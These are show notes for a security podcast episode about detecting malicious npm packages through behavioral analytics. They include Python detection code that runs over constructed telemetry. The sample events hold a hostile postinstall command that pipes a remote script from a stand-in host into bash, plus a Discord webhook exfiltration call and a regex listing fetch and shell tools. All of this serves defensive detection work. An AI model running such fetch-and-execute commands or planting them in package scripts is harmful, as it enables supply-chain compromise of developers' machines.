Red Canary SecOps Weekly: Episode 66 – Transforming malicious package analysis into behavioral logic

SecOps Weekly | 05.26.26

Transforming malicious package analysis into behavioral logic

Senior Malware Analyst Tony Lambert shares how SecOps teams can spot npm malware by turning what malicious packages do into behavioral detections.

SHOW NOTES

In this episode of SecOps Weekly, Senior Malware Analyst Tony Lambert joins us live to discuss how to proactively detect malicious npm packages and supply chain attacks in CI/CD pipelines using behavioral analytics rather than relying solely on threat intelligence indicators.

The discussion covers the challenges of securing the development environments where malicious packages usually execute, including developer machines and CI/CD runners that hold sensitive tokens and secrets. Tony demonstrates malware analysis techniques on real examples, including packages that use Discord webhooks for data exfiltration and post-install scripts for code execution.

The episode emphasizes moving beyond atomic indicators to more durable detection analytics by understanding adversary behaviors and generalizing the resulting detection patterns. Key topics include the latest malware families, the use of tools like TruffleHog for secret discovery, and practical approaches to building resilient detection capabilities from telemetry you already have, such as EDR process data and network logs.
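The two case studies discussed in the episode (a Node process contacting a Discord webhook, and a suspicious npm postinstall execution) expressed as behavioral analytics over constructed EDR-style events. This is an added example, not code from the episode or from Red Canary; the event schema and field names are assumptions, as is the assumption that the sensor records the `npm_lifecycle_event` environment variable that npm sets when running lifecycle scripts.

```python
"""Two behavioral analytics over constructed process and network telemetry.
The event format is an assumption, not any vendor's schema."""
import re
from urllib.parse import urlparse

# Constructed sample telemetry: one true positive and one benign control per analytic.
EVENTS = [
    {"type": "net", "process": "node", "pid": 4101, "method": "POST",
     "url": "https://discord.com/api/webhooks/123/abcdef"},
    {"type": "net", "process": "node", "pid": 4102, "method": "GET",
     "url": "https://registry.npmjs.org/lodash"},
    {"type": "proc", "pid": 5200, "parent_cmd": "npm install",
     "cmd": "sh -c curl -s https://example.invalid/x.sh | bash",
     "env": {"npm_lifecycle_event": "postinstall"}},
    {"type": "proc", "pid": 5201, "parent_cmd": "npm install",
     "cmd": "node-gyp rebuild",
     "env": {"npm_lifecycle_event": "install"}},
]

# Generalize past a single webhook URL: match the service and the webhook path, not one ID.
DISCORD_HOSTS = {"discord.com", "discordapp.com", "canary.discord.com"}
FETCH_OR_INTERPRET = re.compile(r"\b(curl|wget|powershell|bash|sh)\b")

def node_to_discord_webhook(ev):
    """Analytic 1: a node process talking to a Discord webhook endpoint."""
    if ev.get("type") != "net" or ev.get("process") != "node":
        return False
    u = urlparse(ev["url"])
    return u.hostname in DISCORD_HOSTS and u.path.startswith("/api/webhooks/")

def suspicious_postinstall(ev):
    """Analytic 2: an npm install-phase lifecycle script that wraps a shell
    which fetches content and pipes it into an interpreter."""
    if ev.get("type") != "proc":
        return False
    lifecycle = ev.get("env", {}).get("npm_lifecycle_event", "")
    if not lifecycle.endswith("install"):        # preinstall, install, postinstall
        return False
    cmd = ev["cmd"]
    shell_wrapped = cmd.startswith(("sh -c", "cmd /c", "cmd.exe /c"))
    return shell_wrapped and "|" in cmd and bool(FETCH_OR_INTERPRET.search(cmd))

def run_analytics(events):
    """Return (analytic_name, pid) for every event that fires an analytic."""
    hits = []
    for ev in events:
        if node_to_discord_webhook(ev):
            hits.append(("node_discord_webhook", ev["pid"]))
        if suspicious_postinstall(ev):
            hits.append(("suspicious_postinstall", ev["pid"]))
    return hits
```

Both analytics key on how the behavior is performed (which process, which lifecycle phase, which endpoint shape) rather than on a specific package name or webhook ID, so they survive the next rename of the same campaign.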

TIMESTAMPS

  • 00:00 – Introduction
  • 01:14 – Welcome to SecOps Weekly!
  • 01:52 – Transforming malicious package analysis into behavioral logic
  • 04:10 – Why it matters
  • 08:41 – The challenge
  • 10:38 – Move from sample analysis to detection logic
  • 12:26 – Useful telemetry
  • 14:40 – “Teach to fish” methodology
  • 15:34 – Detect emerging npm malware faster
  • 17:24 – Case study #1: Node contacting Discord webhooks
  • 24:31 – Case study #2: Suspicious postinstall execution
  • 29:31 – Key takeaways
